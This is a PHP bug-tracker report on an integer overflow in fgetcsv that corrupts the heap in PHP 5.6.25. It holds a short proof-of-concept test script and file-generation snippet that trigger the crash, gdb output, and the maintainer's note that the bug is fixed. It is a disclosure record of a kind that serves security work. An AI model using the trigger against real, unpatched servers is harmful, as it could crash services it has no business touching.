PHP :: Bug #73045 :: integer overflow in fgetcsv caused heap corruption

Bug #73045	integer overflow in fgetcsv caused heap corruption
Submitted:	2016-09-08 09:37 UTC	Modified:	2017-02-13 01:24 UTC
From:	minhrau dot vc dot 365 at gmail dot com	Assigned:	stas (profile)
Status:	Closed	Package:	*General Issues
PHP Version:	5.6.25	OS:	ALL
Private report:	No	CVE-ID:	None

View Developer Edit

Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.

Password:

Status:
Package:
Bug Type:
Summary:
From:	minhrau dot vc dot 365 at gmail dot com
New email:
PHP Version:		OS:

New Comment:

[2016-09-08 09:37 UTC] minhrau dot vc dot 365 at gmail dot com

Description:
------------
The fgetcsv function will read file and parse it as csv. But if has has a csv field with length, it'll cause integer overflow and will lead to heap corruption:

PHPAPI void php_fgetcsv(php_stream *stream, char delimiter, char enclosure, char escape_char, size_t buf_len, char *buf, zval *return_value TSRMLS_DC) /* {{{ */
{
	char *temp, *tptr, *bptr, *line_end, *limit;
	size_t temp_len, line_end_len;
	int inc_len;
	zend_bool first_field = 1;

...
	temp_len = buf_len;
	temp = emalloc(temp_len + line_end_len + 1); //this value here will be overflow integer

	/* Initialize return array */
	array_init(return_value);

Test script:
---------------
<?php

ini_set('memory_limit', -1);

$handle = fopen("/opt/lampp/htdocs/a", "r");
/*use python to create this file:
>>> f = open("/opt/lampp/htdocs/a", 'w')
>>> f.write("a,"+"A"*(0xffffffff/2+1000))
>>> f.close()
*/
$str1 = fgetcsv($handle); 
 
var_dump(strlen($str1[1]));

chunk_split($str1[1], 11, $str1[1]);
?>


Expected result:
----------------
No crash

Actual result:
--------------
Starting program: /home/minhrau/PHP-5.6.25/sapi/cli/php ~/phptestcase/testfgetcsv.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".


Breakpoint 1, php_fgetcsv (stream=0x7ffff7fa1190, delimiter=44 ',', enclosure=34 '"', escape_char=92 '\\', buf_len=2147484649, buf=0x7ffef0726030 "a,", 'A' <repeats 198 times>..., return_value=0x7ffff7fa0018) at /home/minhrau/PHP-5.6.25/ext/standard/file.c:2072
2072		temp = emalloc(temp_len + line_end_len + 1);
(gdb) p temp_len + line_end_len + 1
$1 = 2147484650
(gdb)c
int(-2147482649)

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff11ff9a4 in __memmove_avx_unaligned_erms () from /usr/lib/libc.so.6
(gdb)

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2016-09-12 03:56 UTC] stas@php.net

Most probably fixed by https://gist.github.com/39b697c75a0502e091a1191f83029034 but there's size_t/uint conversion so to be sure I'll add a check.

[2016-09-12 03:59 UTC] stas@php.net

-Assigned To: +Assigned To: stas

[2016-09-13 04:11 UTC] stas@php.net

-Status: Assigned +Status: Closed

[2016-09-13 04:11 UTC] stas@php.net

The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.

[2017-02-13 01:24 UTC] stas@php.net

-Type: Security +Type: Bug

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2024 The PHP Group All rights reserved.	Last updated: Thu Nov 21 13:01:29 2024 UTC